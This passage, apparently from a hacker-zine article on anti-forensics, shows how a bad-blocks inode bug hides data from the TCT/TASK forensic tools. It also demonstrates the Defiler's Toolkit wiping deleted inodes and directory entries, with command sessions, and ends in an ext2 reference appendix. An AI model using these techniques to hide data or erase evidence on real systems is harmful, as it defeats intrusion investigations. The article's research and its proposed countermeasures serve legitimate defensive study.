+forensic analyst, and providing the basis for several enhancements [2][3],
+it remains as flawed today as when it was first released. A major file
+system implementation bug allows an attacker to store arbitrary amounts of
+data in a location which the TCT tools cannot examine.
+
+    The TCT implementations of the Berkley Fast File System (FFS or
+sometimes UFS), and the Second Extended File System (ext2fs), fail to
+correctly reproduce the file system specifications. TCT makes the incorrect
+assumption that no data blocks can be allocated to an inode before the root
+inode; failing to take into account the bad blocks inode.
+
+    Historically, the bad blocks inode was used to reference data blocks
+occupying bad sectors of the hard disk, preventing these blocks from being
+used by live files. The FFS has deprecated the bad blocks inode, preventing
+the successful exploitation of this bug, but it is still in use on ext2fs.
+Successfully exploiting a file system data hiding attack means, for an
+anti-forensics agent, manipulating the file system without altering it
+outside of the specifications implemented in the file system checker: fsck.
+Although, it is interesting to note that no forensic analysis methodology
+uses fsck to ensure that the file system has not been radically altered.
+
+    The ext2fs fsck still uses the bad blocks inode for bad block
+referencing, and so it allows any number of blocks to be allocated to the
+inode. Unfortunately, the TCT file system code does not recognise the bad
+blocks inode as within the scope of an investigation. The bad blocks inode
+bug is easy to spot, and should be trivial to correct. Scattered throughout
+the file system code of the TCT package (and the related toolkit TASK) is
+the following errorneous check:
+
+    /*
+     * Sanity check.
+     */ 
+     if (inum < EXT2_ROOT_INO || inum > ext2fs->fs.s_inodes_count)
+          error("invalid inode number: %lu", (ULONG) inum);
+
+    The first inode that can allocate block resources on a ext2 file system
+is in fact the bad blocks inode (inode 1) -- *not* the root inode (inode
+2). Because of this mis-implementation of the ext2fs it is possible to
+store data on blocks allocated to the bad blocks inode and have it hidden
+from an analyst using TCT or TASK. To illustrate the severity of this
+attack the following examples demonstrate using the accompanying runefs
+toolkit to: create hidden storage space; copy data to and from this area,
+and show how this area remains secure from a forensic analyst.
+
+----[ 3.1 - Example: Creating hidden space
+
+# df -k /dev/hda6
+Filesystem           1k-blocks      Used Available Use% Mounted on
+/dev/hda6              1011928        20    960504   1% /mnt
+# ./bin/mkrune -v /dev/hda6
++++ bb_blk +++ 
+    bb_blk->start = 33275
+    bb_blk->end = 65535
+    bb_blk->group = 1
+    bb_blk->size = 32261
++++ 
+rune size: 126M
+# df -k /dev/hda6
+Filesystem           1k-blocks      Used Available Use% Mounted on
+/dev/hda6              1011928    129196    831328  14% /mnt
+# e2fsck -f /dev/hda6
+e2fsck 1.26 (3-Feb-2002)
+Pass 1: Checking inodes, blocks, and sizes
+Pass 2: Checking directory structure
+Pass 3: Checking directory connectivity
+Pass 4: Checking reference counts
+Pass 5: Checking group summary information
+/dev/hda6: 11/128768 files (0.0% non-contiguous), 36349/257032 blocks
+#
+
+    This first example demonstrates the allocation of 126 megabytes of disk
+space for the hidden storage area, showing how this loss of available disk
+space is registered by the kernel. It is also evident that the hidden
+storage area does not break the specifications of the ext2 file system --
+fsck has no complaints.
+
+----[ 3.2 - Example: Using the hidden space
+
+# cat readme.tools | ./bin/runewr /dev/hda6
+# ./bin/runerd /dev/hda6 > f
+# diff f readme.tools 
+# 
+
+    This second example shows how data can be inserted and extracted from
+the hidden storage space without any data loss. While this example does not
+comprehensively explore the uses of a hidden data storage area, it is
+sufficient to demonstrate how data can be introduced to and extracted from
+the runefs.
+
+----[ 3.3 - Example: TCT incorrect ext2fs implementation
+
+# ./icat /dev/hda6 1
+/icat: invalid inode number: 1
+#
+
+    This last example illustrates how the forensic analyst is incapable of
+finding this storage area with the TCT tools. Clearly, there are many
+problems raised when the file system being examined has not been correctly
+implemented in the tools used.
+
+    Interesting as these examples are, there are problems with this runefs.
+This implementation of runefs is crude and old (it was written in November
+2000), and it does not natively support encryption. The current version of
+runefs is a dynamicly resizeable file system which supports a full
+directory structure, is fully encrypted, and can grow up to four gigabytes
+in size (it is private, and not will be made available to the public).
+
+    The final problem with this runefs in particular, and the private
+implementation as well, is that the bad blocks data hiding technique is now
+public knowledge (quite obviously). This highlights the problem with data
+hiding techniques, they become out dated. For this reason data hiding
+should always be used in conjunction with at least one other anti-forensics
+technology, such as encryption.
+
+    There are more ways of securely storing data on the file system far
+from the prying eyes of the forensic analyst, and a research paper is due
+shortly that will detail many of them. However, this is the last this
+article will mention on data hiding, now the focus shifts to data
+destruction.
+
+
+--[ 4 - The Defiler's Toolkit
+
+    The file system (supposedly) contains a record of file I/O activity on
+a computer and forensic analysts attempt to extract this record for
+examination. Aside from their forensic tools incorrectly reporting on the
+data, these tools are useless if the data is not there to be reported on.
+This section will present methodologies for thoroughly eradicating evidence
+on a file system. These methodologies have been implemented in The
+Defiler's Toolkit (TDT) which accompanies this article.
+
+    The major vulnerablity with data aquisition is that the evidence being
+gathered must be there when the forensic analyst begins his investigation.
+Non-existant data, obviously, cannot be gathered, and without this crucial
+information the forensic analyst is incapable of progressing the
+investigation. 
+
+    File system sanitization is the anti-forensic strategy of removing this
+data (evidence), and doing so in such a way so as to leave no trace that
+evidence ever existed (i.e. leave no "evidence of erasure"). The Defiler's
+Toolkit provides tools to remove data from the file system with surgical
+precision. By selectively eradicating the data which might become evidence,
+the anti-forensics agent is able to subvert the entire forensics process
+before it is even begun.
+
+    Within a Unix file system all of the following places will contain
+traces of the existence of a file -- they contain evidence:
+
+        * inodes
+        * directory entries
+        * data blocks
+
+    Unfortunately, most secure deletion tools will only remove evidence
+from data blocks, leaving inodes and directory entries untouched. Included
+with this article is an example implementation of an anti-forensic toolkit
+which performs complete file system sanitization. The Defiler's Toolkit
+provides two tools, necrofile and klismafile, which, combined, securely
+eliminate all trace of a file's existance.
+
+    The Defiler's Toolkit consists of two complimentary tools, necrofile
+and klismafile. Their design goals and implementation are described here.
+
+----[ 4.1 - Necrofile
+
+    Necrofile is a sophisicated dirty inode selection and eradication tool.
+It can be used to list all dirty inodes meeting certain deletion time
+criteria, and then scrub those inodes clean. These clean inodes provide no
+evidence for the forensic analyst investigating the file system contained
+on that disk.
+
+    Necrofile has some built in capabilities to securely delete all content
+on the data blocks referenced by the dirty inode. However, this is not the
+ideal use of the tool because of the race conditions which afflict all
+tools handling file system resources without the blessing of the kernel.
+
+    When necrofile is invoked, it is supplied with a file system to search,
+and a number of criteria be used to determine whether a given dirty inode
+should be scrubbed clean. As necrofile iterates through the inode table, it
+check the state of each inode, with dirty inodes being given extra
+attention. All dirty inodes that meet the time criteria are written back
+to the inode table as virgin inodes, and the iteration continues.
+
+------[ 4.1.1 - Example: TCT locates deleted inodes
+
+# ./ils /dev/hda6
+class|host|device|start_time
+ils|XXX|/dev/hda6|1026771982
+st_ino|st_alloc|st_uid|st_gid|st_mtime|st_atime|st_ctime|st_dtime|st_mode|\
+st_nlink|st_size|st_block0|st_block1
+12|f|0|0|1026771841|1026771796|1026771958|1026771958|100644|0|86|545|0
+13|f|0|0|1026771842|1026771796|1026771958|1026771958|100644|0|86|546|0
+14|f|0|0|1026771842|1026771796|1026771958|1026771958|100644|0|86|547|0
+15|f|0|0|1026771842|1026771796|1026771958|1026771958|100644|0|86|548|0
+16|f|0|0|1026771842|1026771796|1026771958|1026771958|100644|0|86|549|0
+17|f|0|0|1026771842|1026771796|1026771958|1026771958|100644|0|86|550|0
+18|f|0|0|1026771842|1026771796|1026771958|1026771958|100644|0|86|551|0
+19|f|0|0|1026771842|1026771796|1026771958|1026771958|100644|0|86|552|0
+20|f|0|0|1026771842|1026771796|1026771958|1026771958|100644|0|86|553|0
+21|f|0|0|1026771842|1026771796|1026771958|1026771958|100644|0|86|554|0
+22|f|0|0|1026771842|1026771796|1026771958|1026771958|100644|0|86|555|0
+23|f|0|0|1026771842|1026771796|1026771958|1026771958|100644|0|86|556|0
+24|f|0|0|1026771842|1026771796|1026771958|1026771958|100644|0|86|557|0
+25|f|0|0|1026771842|1026771796|1026771958|1026771958|100644|0|86|558|0
+26|f|0|0|1026771842|1026771796|1026771958|1026771958|100644|0|86|559|0
+27|f|0|0|1026771842|1026771796|1026771958|1026771958|100644|0|86|560|0
+28|f|0|0|1026771842|1026771796|1026771958|1026771958|100644|0|86|561|0
+29|f|0|0|1026771842|1026771796|1026771958|1026771958|100644|0|86|562|0
+30|f|0|0|1026771842|1026771796|1026771958|1026771958|100644|0|86|563|0
+31|f|0|0|1026771842|1026771796|1026771958|1026771958|100644|0|86|564|0
+32|f|0|0|1026771842|1026771796|1026771958|1026771958|100644|0|86|565|0
+33|f|0|0|1026771842|1026771796|1026771958|1026771958|100644|0|86|566|0
+34|f|0|0|1026771842|1026771796|1026771958|1026771958|100644|0|86|567|0
+35|f|0|0|1026771842|1026771796|1026771958|1026771958|100644|0|86|568|0
+36|f|0|0|1026771842|1026771796|1026771958|1026771958|100644|0|86|569|0
+37|f|0|0|1026771842|1026771796|1026771958|1026771958|100644|0|86|570|0
+#
+
+------[ 4.1.2 - Example: necrofile locates and eradicates deleted inodes
+
+# ./necrofile -v -v -v -v /dev/hda6 
+Scrubbing device: /dev/hda6
+12 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+13 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+14 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+15 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+16 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+17 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+18 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+19 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+20 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+21 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+22 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+23 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+24 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+25 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+26 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+27 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+28 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+29 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+30 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+31 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+32 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+33 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+34 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+35 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+36 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+37 = m: 0x3d334d4d a: 0x3d334d4d c: 0x3d334d4f d: 0x3d334d4f
+
+#
+
+------[ 4.1.3 - Example: TCT unable to locate non-existant data
+
+#  ./ils /dev/hda6 
+class|host|device|start_time
+ils|XXX|/dev/hda6|1026772140
+st_ino|st_alloc|st_uid|st_gid|st_mtime|st_atime|st_ctime|st_dtime|st_mode|\
+st_nlink|st_size|st_block0|st_block1
+# 
+
+    Little explanation is necessary with these examples. The "ils" tool is
+part of TCT and lists deleted inodes for potential recovery. The necrofile
+tool is being run in its most verbose form, as it locates and overwrites
+the same inodes found by ils. Necrofile is more effective, however, when
+used to target inodes deleted during specific time slices, leaving all
+other deleted inodes untouched. This tactic eliminates evidence of erasure,
+i.e. indications that evidence has been removed. After the deleted inodes
+have been converted into virgin inodes, ils is justifiably incapable of
+finding them. After removing the inodes which contain valuable forensic
+data, the other location which needs to be sanitized is the directory
+entries. 
+
+----[ 4.2 - Klismafile
+
+    Klismafile provides a means of securely overwriting deleted directory
+entries. When a file name/inode link is terminated, the content of the
+directory entry is not overwritten; simply included in the slack space of
+the preceeding entry. Klismafile will search a directory file for these
+"deleted" entries, and overwrite them. Regular expressions can be used to
+limit the number of directory entries removed.
+
+    When klismafile is invoked, it is provided with a directory file to
+search, and can optionally recurse through all other directory files it
+encounters. Klismafile will iterate through the directory entries, and
+search for dirents which have been deleted. When it encounters a deleted
+dirent, klismafile will compare the 'file_name' against any regular
+expressions provided by the invoker (the default is '*'). If there is a
+match, klismafile will overwrite the dirent with zeroes.
+
+    Klismafile is not a completely secure solution. A skilled forensic
+analyst will note that the preceeding directory entry's rec_len field is
+larger than it should be, and could infer than a tool such as klismafile
+has artificially manipulated the directory file's contents. Currently,
+there are no tools which perform this check, however that will no doubt
+change soon.
+
+------[ 4.2.1 - Example: fls listing deleted directory entries
+
+# ./fls -d /dev/hda6 2           
+? * 0:  a
+? * 0:  b
+? * 0:  c
+? * 0:  d
+? * 0:  e
+? * 0:  f
+? * 0:  g
+? * 0:  h
+? * 0:  i
+? * 0:  j
+? * 0:  k
+? * 0:  l
+? * 0:  m
+? * 0:  n
+? * 0:  o
+? * 0:  p
+? * 0:  q
+? * 0:  r
+? * 0:  s
+? * 0:  t
+? * 0:  u
+? * 0:  v
+? * 0:  w
+? * 0:  x
+? * 0:  y
+? * 0:  z
+#
+
+------[ 4.2.2 - Example: Klismafile cleaning deleted directory entries
+
+# ./klismafile -v /mnt
+Scrubbing device: /dev/hda6
+cleansing /
+-> a
+-> b
+-> c
+-> d
+-> e
+-> f
+-> g
+-> h
+-> i
+-> j
+-> k
+-> l
+-> m
+-> n
+-> o
+-> p
+-> q
+-> r
+-> s
+-> t
+-> u
+-> v
+-> w
+-> x
+-> y
+-> z
+Total files found:      29
+Directories checked:    1
+Dirents removed :       26
+# 
+
+------[ 4.2.3 - Example: fls unable to find non-existant data
+
+# ./fls -d /dev/hda6 2  
+#
+
+    These examples speak for themselves. The 'fls' utility is part of the
+TCT-UTILS package, and is intended to examine directory files. In this
+case, it is listing all deleted directory entries in the root directory of
+the file system. Klismafile is then run in verbose mode, listing and
+overwriting each directory entry it encounters. After klismafile, fls is
+incapable of noting that anything is amiss within the directory file.
+
+    Note: The linux 2.4 kernel caches directories in kernel memory, rather
+than immediately updating the file system on disk. Because of this, the
+directory file that klismafile examines and attempts to clean might not be
+current, or the changes made might get overwritten by the kernel. Usually,
+performing disk activity in another directory will flush the cache,
+allowing kilsmafile to work optimally.
+
+    The Defiler's Toolkit has been written as a proof of concept utility to
+demonstrate the inherent flaws with all current digital forensic
+methodologies and techniques. The toolkit successfully accomplishes the
+goals for which it was designed; proving that forensic analysis after an
+intrusion is highly suspect without significant prior preparation of the
+targeted computers.
+
+
+--[ 5 - Conclusion
+
+    Digital forensic tools are buggy, error prone and inherently flawed.
+Despite these short comings they are being relied on more and more
+frequently to investigate computer break-ins. Given that this
+fundamentally broken software plays such a key role in incident response,
+it is somewhat surprising that no-one has documented anti-forensic
+techniques, nor sort to develop counter-measures (anti-anti-forensics).
+Some suggestions regarding anti-anti-forensics methodology are presented
+here, to provide the security community a foothold in the struggle against
+anti-forensics.  
+
+    The Defilers Toolkit directly modifies the file system to eliminate
+evidence inserted by the operating system during run time. The way to
+defeat the defiler's toolkit is to not rely on the local file system as the
+only record of disk operations. For instance, make a duplicate record of
+the file system modifications and store this record in a secure place. The
+simplest solution would be to have all inode updates be written to a log
+file located on a seperate box. A trivial addition to the kernel vfs
+layer, and a syslog server would be more than adequate for a first
+generation anti-anti-fornesics tool.
+
+    The only means of effectively counteracting an anti-forensics attack
+is to prepare for such an eventuality prior to an incident. However,
+without the tools to make such preparation effective, the computing public
+is left vulnerable to attackers whose anonymity is assured. This article is
+intended as a goad to prod the security industry into developing effective
+tools. Hopefully the next generation of digital forensic investigating
+tookits will give the defenders something reliable with which to
+effectively combat the attackers.
+
+
+--[ 6 - Greets
+
+Shout outs to my homies!
+East Side: stealth, scut, silvio, skyper, smiler, halvar, acpizer, gera
+West Side: blaadd, pug, srk, phuggins, fooboo, will, joe
+Up Town: mammon_, a_p, _dose
+Down Town: Grendel, PhD.
+
+
+--[ 7 - References:
+
+[1] Dan Farmer, Wietse Venema "TCT"
+    www.fish.com/security
+[2] Brian Carrier "TCTUTILS"
+    www.cerias.purdue.edu/homes/carrier/forensics
+[3] Brian Carrier "TASK"
+    www.cerias.purdue.edu/homes/carrier/forensics
+[4] Theodore T'so "e2fsprogs"
+    e2fsprogs.sourceforge.net
+
+
+--[ 8 - APPENDIX A
+
+----[ 8.1 - Ext2fs
+
+    In the honored phrack tradition of commented header files, here is a
+guide to the second extended file system. 
+
+    The second extended file system (ext2fs) is the standard file system on
+the Linux OS. This paper will provide an introduction to the file system.
+Reading this document is no substitute for reading the src, both in the
+kernel and in the ext2fs library. 
+
+    What follows is a bottom up description of the ext2 file system;
+starting with blocks and inodes and concluding, ultimately, with
+directories.
+
+		. o O ( B L O C K S ) O o .
+
+    The basic component of the file system is the data block, used to store
+file content. Typically, the smallest addressable unit on a hard disk is a
+sector (512 bytes), but this is too small for decent I/O rates. To increase
+performance multiple sectors are clustered together and treated as one
+unit: the data block. The typical block size on an ext2fs system is 4096
+bytes; however, it can be 2048 bytes or even as small as 1024 (8, 4 and 2
+sectors, respectively). 
+
+		. o O ( I N O D E S ) O o .
+
+    The second core part of the file system, the inode, is the heart of
+the Unix file system. It contains the meta-data about each file including:
+pointers to the data blocks, file permissions, size, owner, group and other
+vital peices of information.
+
+The format of an ext2 inode is as follows:
+
+---------------------------------------------------------------------------
+struct ext2_inode {
+	__u16	i_mode;		/* File mode */
+	__u16	i_uid;		/* Owner Uid */
+	__u32	i_size;		/* Size in bytes */
+	__u32	i_atime;	/* Access time */
+	__u32	i_ctime;	/* Creation time */
+	__u32	i_mtime;	/* Modification time */
+	__u32	i_dtime;	/* Deletion Time */
+	__u16	i_gid;		/* Group Id */
+	__u16	i_links_count;	/* Links count */
+	__u32	i_blocks;	/* Blocks count */
+	__u32	i_flags;	/* File flags */
+	union {
+		struct {
+			__u32  l_i_reserved1;
+		} linux1;
+		struct {
+			__u32  h_i_translator;
+		} hurd1;
+		struct {
+			__u32  m_i_reserved1;
+		} masix1;
+	} osd1;				/* OS dependent 1 */
+	__u32	i_block[EXT2_N_BLOCKS];/* Pointers to blocks */
+	__u32	i_version;	/* File version (for NFS) */
+	__u32	i_file_acl;	/* File ACL */
+	__u32	i_dir_acl;	/* Directory ACL */
+	__u32	i_faddr;	/* Fragment address */
+	union {
+		struct {
+			__u8	l_i_frag;	/* Fragment number */
+			__u8	l_i_fsize;	/* Fragment size */
+			__u16	i_pad1;
+			__u32	l_i_reserved2[2];
+		} linux2;
+		struct {
+			__u8	h_i_frag;	/* Fragment number */
+			__u8	h_i_fsize;	/* Fragment size */
+			__u16	h_i_mode_high;
+			__u16	h_i_uid_high;
+			__u16	h_i_gid_high;
+			__u32	h_i_author;
+		} hurd2;
+		struct {
+			__u8	m_i_frag;	/* Fragment number */
+			__u8	m_i_fsize;	/* Fragment size */
+			__u16	m_pad1;
+			__u32	m_i_reserved2[2];
+		} masix2;
+	} osd2;				/* OS dependent 2 */
+};
+---------------------------------------------------------------------------
+
+    The two unions exist because the ext2fs is intended to be used on
+several operating systems that provide slightly differing features in their
+implementations. Aside from exceptional cases, the only elements of the
+unions that matter are the Linux structs: linux1 and linux2. These can
+simply be treated as padding as their contents are ignored in current
+implementations of ext2fs. The usage of the rest of the inode's values are
+described below.
+
+* i_mode 	The mode of the file, this is the usual octal permissions
+		that Unix users should be familiar with.
+
+* i_uid		The UID of the owner of the file. 
+
+* i_size 	The size of the file, in bytes. Clearly the maximum size is
+		4G, as size is an unsigned 32bit integer. Support for 64bit
+		file sizes had been hacked in with the following define
+		supplying the high 32bits:
+#define i_size_high	i_dir_acl
+
+* i_atime	The last time the file was accessed. All times are stored
+		in usual Unix manner: seconds since the epoch.
+
+* i_ctime	The creation time of the file.
+
+* i_mtime	The last time the file was modified.
+
+* i_dtime	The deletion time of the file. If the file is still live
+		then the time will be 0x00000000.
+
+* i_gid		The GID of the file.
+
+* i_links_count	The number of times that the file is referenced in the high
+		level file system. That is, each hard link to the file
+		increments this count. When the last link to the file is
+		removed from the FS, and the links count reaches 0, the
+		file is deleted. The blocks referenced by the inode are
+		marked as free in the bitmap.
+
+* i_blocks	The number of blocks referenced by the inode. This is count
+		doesn't include the indirect blocks, only blocks that
+		contain actual file content. 
+
+* i_flags	The extended attributes of the ext2fs are accomplished with
+		this value. The valid flags are any combination of the
+		following:
+---------------------------------------------------------------------------
+#define	EXT2_SECRM_FL		0x00000001 /* Secure deletion */
+#define	EXT2_UNRM_FL		0x00000002 /* Undelete */
+#define	EXT2_COMPR_FL		0x00000004 /* Compress file */
+#define EXT2_SYNC_FL		0x00000008 /* Synchronous updates */
+#define EXT2_IMMUTABLE_FL	0x00000010 /* Immutable file */
+#define EXT2_APPEND_FL		0x00000020 /* append only */
+#define EXT2_NODUMP_FL		0x00000040 /* do not dump file */
+#define EXT2_NOATIME_FL		0x00000080 /* do not update atime */
+/* Reserved for compression usage... */
+#define EXT2_DIRTY_FL		0x00000100
+#define EXT2_COMPRBLK_FL	0x00000200 /* compressed clusters */
+#define EXT2_NOCOMP_FL		0x00000400 /* Don't compress */
+#define EXT2_ECOMPR_FL		0x00000800 /* Compression error */
+/* End compression flags --- maybe not all used */	
+#define EXT2_BTREE_FL		0x00001000 /* btree format dir */
+#define EXT2_RESERVED_FL	0x80000000 /* reserved for ext2 lib */
+---------------------------------------------------------------------------
+
+* i_block[]	The block pointers. There are 15 array elements, the first
+		12 elements are direct blocks pointers; their blocks
+		contain actual file content. The 13th element points to a
+		block that acts as an extension of the array. This block is
+		an indirect block, and the pointers it contains point to
+		additional direct blocks. The 14th element points to a block
+		containing an array of block pointers to indirect blocks.
+		This element is the doubly indirect block. The last element
+		is the trebly indirect block. This block contains pointers
+		to doubly indirect blocks.
+---------------------------------------------------------------------------
+#define	EXT2_NDIR_BLOCKS		12
+#define	EXT2_IND_BLOCK			EXT2_NDIR_BLOCKS
+#define	EXT2_DIND_BLOCK			(EXT2_IND_BLOCK + 1)
+#define	EXT2_TIND_BLOCK			(EXT2_DIND_BLOCK + 1)
+#define	EXT2_N_BLOCKS			(EXT2_TIND_BLOCK + 1)
+---------------------------------------------------------------------------
+
+* i_version	The file version. Doesn't appear to be used.
+
+* i_file_acl	A pointer to an ACL list. This is not used on ext2, as
+		there are no ACLs implemented for this version of the file
+		system.
+
+* i_dir_acl	A pointer to an ACL list. This is not used on ext2 as an
+		ACL pointer, but rather as the value: [ i_size_high ]. This
+		is an additional 32bits of file size, allowing the file size
+		to be treated as a 64bit unsigned intetger. This is not
+		generally used on ext2fs.
+
+* i_faddr	The fragment address. Fragments are not used on the ext2fs;
+		therefore, this value is always 0.
+
+Certain inodes have special significance within the file system.
+
+---------------------------------------------------------------------------
+#define EXT2_BAD_INO             1      /* Bad blocks inode */
+#define EXT2_ROOT_INO            2      /* Root inode */
+#define EXT2_ACL_IDX_INO         3      /* ACL inode */
+#define EXT2_ACL_DATA_INO        4      /* ACL inode */
+#define EXT2_BOOT_LOADER_INO     5      /* Boot loader inode */
+#define EXT2_UNDEL_DIR_INO       6      /* Undelete directory inode */
+---------------------------------------------------------------------------
+
+    The bad blocks inode contains block pointers to data blocks that occupy
+bad sectors of the hard disk. The root inode is the root directory that
+contains the head of the file system tree. The other inodes are not
+typically used on production systems. The first inode used for user files
+is inode 11. This inode is the directory "lost+found", created by the tool
+mkfs. 
+
+		. o O ( S U P E R B L O C K ) O o .
+
+    The super block is the most basic means that the kernel has of
+determining the status of the file system. It indicates the number of
+inodes, blocks, and groups, in addition to various other pieces of
+information. The elements within the super block structure change more
+rapidly than the inode or group data. This is because libext2fs adds
+features to the ext2fs which might not be implemented in the kernel. The
+format we examine is from e2fsprogs-1.19.
+
+    The super block is 1024 bytes in size, and offset 1024 bytes from the
+start of the partition.
+
+The format of the super block is as follows:
+---------------------------------------------------------------------------
+struct ext2fs_sb {
+	__u32	s_inodes_count;		/* Inodes count */
+	__u32	s_blocks_count;		/* Blocks count */
+	__u32	s_r_blocks_count;	/* Reserved blocks count */
+	__u32	s_free_blocks_count;	/* Free blocks count */
+	__u32	s_free_inodes_count;	/* Free inodes count */
+	__u32	s_first_data_block;	/* First Data Block */
+	__u32	s_log_block_size;	/* Block size */
+	__s32	s_log_frag_size;	/* Fragment size */
+	__u32	s_blocks_per_group;	/* # Blocks per group */
+	__u32	s_frags_per_group;	/* # Fragments per group */
+	__u32	s_inodes_per_group;	/* # Inodes per group */
+	__u32	s_mtime;		/* Mount time */
+	__u32	s_wtime;		/* Write time */
+	__u16	s_mnt_count;		/* Mount count */
+	__s16	s_max_mnt_count;	/* Maximal mount count */
+	__u16	s_magic;		/* Magic signature */
+	__u16	s_state;		/* File system state */
+	__u16	s_errors;		/* Behaviour when detecting errors */
+	__u16	s_minor_rev_level; 	/* minor revision level */
+	__u32	s_lastcheck;		/* time of last check */
+	__u32	s_checkinterval;	/* max. time between checks */
+	__u32	s_creator_os;		/* OS */
+	__u32	s_rev_level;		/* Revision level */
+	__u16	s_def_resuid;		/* Default uid for reserved blocks */
+	__u16	s_def_resgid;		/* Default gid for reserved blocks */
+	/*
+	 * These fields are for EXT2_DYNAMIC_REV superblocks only.
+	 *
+	 * Note: the difference between the compatible feature set and
+	 * the incompatible feature set is that if there is a bit set
+	 * in the incompatible feature set that the kernel doesn't
+	 * know about, it should refuse to mount the filesystem.
+	 * 
+	 * e2fsck's requirements are more strict; if it doesn't know
+	 * about a feature in either the compatible or incompatible
+	 * feature set, it must abort and not try to meddle with
+	 * things it doesn't understand...
+	 */
+	__u32	s_first_ino; 		/* First non-reserved inode */
+	__u16   s_inode_size; 		/* size of inode structure */
+	__u16	s_block_group_nr; 	/* block group # of this superblock */
+	__u32	s_feature_compat; 	/* compatible feature set */
+	__u32	s_feature_incompat; 	/* incompatible feature set */
+	__u32	s_feature_ro_compat; 	/* readonly-compatible feature set */
+	__u8	s_uuid[16];		/* 128-bit uuid for volume */
+	char	s_volume_name[16]; 	/* volume name */
+	char	s_last_mounted[64]; 	/* directory where last mounted */
+	__u32	s_algorithm_usage_bitmap; /* For compression */
+	/*
+	 * Performance hints.  Directory preallocation should only
+	 * happen if the EXT2_FEATURE_COMPAT_DIR_PREALLOC flag is on.
+	 */
+	__u8	s_prealloc_blocks;	/* Nr of blocks to try to preallocate*/
+	__u8	s_prealloc_dir_blocks;	/* Nr to preallocate for dirs */
+	__u16	s_padding1;
+	/* 
+	 * Journaling support.
+	 */
+	__u8	s_journal_uuid[16];	/* uuid of journal superblock */
+	__u32	s_journal_inum;		/* inode number of journal file */
+	__u32	s_journal_dev;		/* device number of journal file */
+	__u32	s_last_orphan;      /* start of list of inodes to delete */
+	
+	__u32	s_reserved[197];    /* Padding to the end of the block   */
+};
+---------------------------------------------------------------------------
+
+* s_inodes_count	The total number of inodes within the file system.
+
+* s_blocks_count	The total number of blocks within the file system.
+
+* s_r_blocks_count	The number of blocks reserved for the super user.
+			If the FS becomes too full, these last reserved
+			blocks will prevent users from making the FS
+			unusable.
+
+* s_free_blocks_count	The number of unused blocks. This value is
+			constantly updated as blocks are freed or
+			allocated.
+
+* s_free_inodes_count	The number of unused inodes. This value is
+			constantly updates as inodes are freed or allocated.
+
+* s_first_data_block	A pointer to the first data block, after all the
+			blocks used to store inode tables, bitmaps and
+			groups. This value is either 0, or the correct
+			value. 
+
+* s_log_block_size	The size of a block. This value is stored as a
+			shift value. The number to be shifted is 1024;
+			therefore, to retrive the actual block size use:
+				bs = 1024 << sb.s_log_block_size;
+
+* s_log_frag_size	The size of a fragment. This value is stored as a
+			shift value. Fragments are not used on the ext2fs;
+			therefore, this value is ignored.
+
+* s_blocks_per_group	The number of blocks in a group.
+
+* s_frags_per_group	The number of fragments in a group.
+
+* s_inodes_per_group	The number of inodes in a group.
+
+* s_mtime		The last time the file system was mounted. All time
+			values are stored as seconds since the epoch.
+
+* s_wtime		The last time the file system was written.
+
+* s_mnt_count		The number of times the file system has been
+			mounted.
+
+* s_max_mnt_count	The maximum number of times the file system can be
+			mounted before it needs to be fsck'd. The default
+			value is 20.
+
+* s_magic		The magic number of the file system: 0xEF53.
+
+* s_state		The state of the file system: either clean, or
+			dirty. The flags are as follows:
+---------------------------------------------------------------------------
+#define EXT2_VALID_FS                   0x0001  /* Unmounted cleanly */
+#define EXT2_ERROR_FS                   0x0002  /* Errors detected */
+---------------------------------------------------------------------------
+
+* s_errors		The response to take when an error is encountered.
+			The following are valid values:
+---------------------------------------------------------------------------
+#define EXT2_ERRORS_CONTINUE            1       /* Continue execution */
+#define EXT2_ERRORS_RO                  2       /* Remount fs read-only */
+#define EXT2_ERRORS_PANIC               3       /* Panic */
+#define EXT2_ERRORS_DEFAULT             EXT2_ERRORS_CONTINUE
+---------------------------------------------------------------------------
+
+* s_minor_rev_level	The minor number of the ext2fs revision. This value
+			can be safely ignored.
+
+* s_lastcheck		The last time the file system was fsck'd, stored in
+			typical Unix sec's since epoch format.
+
+* s_checkinterval	The maximum amount of time that can elapse between
+			fsckings. The file system needs to fscked if either
+			this value is exceeded, or s_max_mnt_count.  
+
+* s_creator_os		The OS that created this file system. Valid values
+			are as follows:
+---------------------------------------------------------------------------
+#define EXT2_OS_LINUX           0
+#define EXT2_OS_HURD            1
